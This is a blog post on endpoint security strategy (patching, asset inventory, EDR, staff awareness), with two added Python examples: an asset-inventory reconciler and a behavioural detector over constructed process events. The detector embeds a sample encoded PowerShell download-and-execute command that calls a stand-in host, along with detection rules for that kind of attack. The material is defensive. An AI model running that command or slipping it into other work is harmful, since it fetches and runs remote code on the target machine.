How to Better Secure the Endpoint: 5 Elements of a Successful Strategy

Endpoints are everywhere and, at the same time, nowhere. Whether it is a laptop or desktop workstation, a smartphone or point-of-sale terminal, a printer or a medical instrument, or even a server in a data center - these network-connected devices are far and away the most common entry point for attackers. And "far and away" is also an apt description of endpoints in general, considering how numerous and decentralized they have become with the unrestrained growth of corporate BYOD mobility, remote access, the Internet of Things and cloud applications.

Attackers like to start small and go after soft targets, which has the added benefit of not raising suspicion or expending too many resources. Endpoints fit that bill well. They are considered the most vulnerable part of the network and are often operated by users who can be talked into lending the attacker a helping hand.

So it may come as no surprise that infections originating on the endpoint are to blame for many of the largest breaches of the past several years. But at a time when new malware strains, such as Trojans and ransomware, are being created at record rates and becoming more targeted and sophisticated, companies do not appear to be doing enough to shift their focus to the endpoint, both of the traditional and the non-traditional variety.

The statistics back this up. According to the SANS Institute, 44 percent of respondents to its third annual survey on endpoint security reported that one or more of their endpoints had been compromised in the past two years, and just 36 percent detect endpoint compromises through automated alerts. Many of an organization's endpoints are either unknown or under-protected (or protected only by traditional, signature-based controls). And when an incident does occur, the typical patchwork of endpoint devices makes it difficult even to isolate where the incident began, never mind respond to and investigate it in any meaningful way.

Meanwhile, many businesses simply lack the resources to reduce endpoint security risk, according to the Ponemon Institute and CounterTack's 2016 State of Endpoint Report (registration required). The study found that just 36 percent of respondents have adequate budget and staff to do so, and, given the relentless demand from employees for mobile device support and access, 71 percent of respondents report difficulty enforcing endpoint security policies.

All is not lost. Thanks to a new wave of technologies, confidence in endpoint security is stronger than it has been in years. But you can't forget about the basics, either. Here are five elements of a successful strategy.

1) Do the Fundamentals Well

We'll discuss technology in a moment, but first make sure you are applying general security best practices. That means tried-and-true principles like requiring users to employ complex passwords (preferably passphrases), removing administrator rights from users, patching vulnerabilities promptly and enforcing security configuration policies.

2) Know Your Endpoints

You can't protect what you don't know about. That is why you must not only thoroughly catalog your endpoints - and ensure that only approved devices are able to connect to your network - but also assess their vulnerability and patching status. You can prioritize the endpoints that are most at risk and contain the most sensitive data, but keep in mind that any endpoint that is internet-connected and can send files demands protection.
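The reconciliation this element calls for can be scripted. The following is an added example (not code from the original post or from Trustwave): it compares a constructed asset register against a constructed DHCP lease log to surface devices on the network that nobody approved, lists approved devices that have not checked in, and ranks the approved ones by data sensitivity and how far past a patch SLA they are. The CSV columns, the lease-line format, the data-class weights and the 30-day SLA are all assumptions chosen for the illustration.

```python
import csv
import io
import re
from datetime import date

# Constructed asset register: what IT believes it owns (made-up data).
ASSET_REGISTER_CSV = """mac,hostname,owner,data_class,last_patched
00:11:22:33:44:01,WS-0412,jdoe,internal,2016-06-14
00:11:22:33:44:02,POS-LOBBY-1,retail,cardholder,2016-02-01
00:11:22:33:44:03,HR-LAPTOP-7,hr,pii,2016-05-30
00:11:22:33:44:04,PRN-3RDFLOOR,facilities,none,2015-11-10
"""

# Constructed DHCP lease log: what is actually on the network (hypothetical format).
DHCP_LEASE_LOG = """2016-06-20 08:01:12 lease 10.0.5.21 mac 00:11:22:33:44:01 host WS-0412
2016-06-20 08:03:40 lease 10.0.5.22 mac 00:11:22:33:44:02 host POS-LOBBY-1
2016-06-20 08:10:05 lease 10.0.5.87 mac 3c:22:fb:aa:bb:cc host iPhone-Mike
2016-06-20 08:11:59 lease 10.0.5.88 mac 00:11:22:33:44:04 host PRN-3RDFLOOR
"""

REPORT_DATE = date(2016, 6, 20)          # "today" for the constructed data
PATCH_SLA_DAYS = 30                      # assumed patch SLA
DATA_CLASS_WEIGHT = {"cardholder": 3, "pii": 3, "internal": 1, "none": 0}  # assumed weights

LEASE_RE = re.compile(r"lease (?P<ip>\S+) mac (?P<mac>[0-9a-f:]{17}) host (?P<host>\S+)",
                      re.IGNORECASE)


def load_register(text):
    """Parse the asset register into a dict keyed by lower-cased MAC address."""
    return {row["mac"].lower(): row for row in csv.DictReader(io.StringIO(text))}


def load_leases(text):
    """Parse lease lines into (mac, ip, hostname) tuples; lines that don't match are skipped."""
    seen = []
    for line in text.splitlines():
        m = LEASE_RE.search(line)
        if m:
            seen.append((m["mac"].lower(), m["ip"], m["host"]))
    return seen


def reconcile(register, leases):
    """Return (devices seen but not approved, approved devices not seen)."""
    seen_macs = {mac for mac, _, _ in leases}
    unknown = [(mac, ip, host) for mac, ip, host in leases if mac not in register]
    not_seen = [row["hostname"] for mac, row in register.items() if mac not in seen_macs]
    return unknown, not_seen


def prioritize(register, today):
    """Rank approved endpoints: data sensitivity dominates, patch age breaks ties and adds pressure."""
    ranked = []
    for row in register.values():
        age = (today - date.fromisoformat(row["last_patched"])).days
        score = DATA_CLASS_WEIGHT.get(row["data_class"], 1) * 10 + min(age // PATCH_SLA_DAYS, 12)
        ranked.append({"hostname": row["hostname"], "score": score,
                       "patch_age_days": age, "overdue": age > PATCH_SLA_DAYS})
    return sorted(ranked, key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    register = load_register(ASSET_REGISTER_CSV)
    unknown, not_seen = reconcile(register, load_leases(DHCP_LEASE_LOG))
    print("Unknown devices on the network:", unknown)
    print("Approved devices not seen today:", not_seen)
    for entry in prioritize(register, REPORT_DATE):
        print(entry)
```

In the constructed data the personal phone shows up as unapproved, the HR laptop is registered but absent, and the point-of-sale terminal ranks first because it holds cardholder data and is months past the SLA; the printer is even staler but holds nothing sensitive, which is exactly the trade-off the prioritization is meant to make visible.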

3) Deploy Advanced and Automated Endpoint Protection

While traditional anti-virus remains important and viable, it cannot alone be counted on to defend endpoints. You must go beyond a signature-based point product and turn to an integrated endpoint security solution that covers the full threat spectrum, offering capabilities like real-time malware protection, application whitelisting, Windows log collection and analysis, and support for mobile devices.

4) Prioritize and Automate Detection and Response

As more organizations recognize the inevitability of a compromise, a solution category known as endpoint detection and response (EDR) has given endpoint security a rebirth of sorts, with Gartner last week declaring it a Top 10 information security technology for 2016. EDR can help identify behaviors and footprints commonly associated with compromises and provide useful endpoint data for effective threat monitoring, analysis and hunting. It also provides comprehensive endpoint-specific visibility to help you connect the dots if an attack is underway. Most of the current crop of EDR solutions require a fair amount of technical savvy and security knowledge to operate successfully, so look to the growing number of managed EDR solutions coming to market as a strong option for deployment.
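To make concrete the "Windows log collection and analysis" from element 3 and the "behaviors and footprints commonly associated with compromises" that EDR looks for in element 4, here is an added example (not code from the original post, from Trustwave, or from any EDR product). It runs three behavioral rules over constructed Sysmon-style process-creation events: an Office application spawning a script host, an encoded PowerShell command line (which it decodes so the analyst can read the payload), and a binary executing from a user-writable directory. The event field names, the sample hostnames and paths, and the rule names are assumptions for the illustration.

```python
import base64
import json
import re

# Constructed payload for the sample event: what an attacker's "-Enc" blob typically carries.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')".encode("utf-16-le")
).decode("ascii")

# Constructed Sysmon-style process-creation events (Event ID 1) as JSON lines. Not real telemetry.
SAMPLE_EVENTS = [
    json.dumps({"ts": "2016-06-20T09:14:02Z", "host": "WS-0412", "user": "CORP\\jdoe",
                "parent": r"C:\Windows\System32\services.exe",
                "image": r"C:\Windows\System32\svchost.exe",
                "cmdline": "svchost.exe -k netsvcs"}),
    json.dumps({"ts": "2016-06-20T09:15:31Z", "host": "WS-0412", "user": "CORP\\jdoe",
                "parent": r"C:\Windows\explorer.exe",
                "image": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
                "cmdline": '"WINWORD.EXE" /n "C:\\Users\\jdoe\\Downloads\\invoice.doc"'}),
    json.dumps({"ts": "2016-06-20T09:15:47Z", "host": "WS-0412", "user": "CORP\\jdoe",
                "parent": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
                "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "cmdline": "powershell.exe -NoP -W Hidden -Enc " + _ENCODED}),
    json.dumps({"ts": "2016-06-20T09:16:02Z", "host": "WS-0412", "user": "CORP\\jdoe",
                "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "image": r"C:\Users\jdoe\AppData\Local\Temp\update.exe",
                "cmdline": "update.exe /silent"}),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
USER_WRITABLE_PATH = re.compile(r"\\(?:appdata\\local\\temp|downloads|users\\public)\\", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; match the common short forms.
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_powershell(blob):
    """-EncodedCommand is base64 over UTF-16LE; return None if the blob is not that."""
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Apply the behavioral rules to one event; return a list of (rule, detail)."""
    findings = []
    image, parent = basename(event["image"]), basename(event["parent"])
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        findings.append(("office_spawns_script_host", f"{parent} -> {image}"))
    m = ENCODED_FLAG.search(event["cmdline"])
    if image == "powershell.exe" and m:
        findings.append(("encoded_powershell", decode_powershell(m.group(1)) or "<undecodable>"))
    if USER_WRITABLE_PATH.search(event["image"]):
        findings.append(("exec_from_user_writable_path", event["image"]))
    return findings


def hunt(lines):
    """Run every rule over every JSON event line; keep host/user/time so findings can be pivoted on."""
    results = []
    for line in lines:
        event = json.loads(line)
        for rule, detail in analyze_event(event):
            results.append({"ts": event["ts"], "host": event["host"],
                            "user": event["user"], "rule": rule, "detail": detail})
    return results


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The point of keeping host, user and timestamp on every finding is the "connect the dots" visibility the paragraph describes: the three hits here all come from one workstation within a minute of each other, which is a very different picture from any one of them alone. None of the rules needs a signature for the payload; the Word document and the dropped binary are never inspected, only the behaviour around them.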

5) Make Employees Your Ally

Of course, all of the endpoint security in the world can be rendered useless if an employee clicks on a phishing email and invites in a specialized piece of malware built to defeat most endpoint security. The aforementioned Ponemon study found that 81 percent of respondents cite "negligent or careless employees" who fail to adhere to security policies as the largest challenge in minimizing endpoint risk. At a minimum, you need to implement a creative security awareness program that teaches workers to recognize risky emails and to avoid clicking untrusted links or opening untrusted attachments. But beyond that, you need to create a culture of security throughout your organization that is built, inspired and endorsed from the top down.

Dan Kaplan is manager of online content at Trustwave and a former IT security reporter and editor.
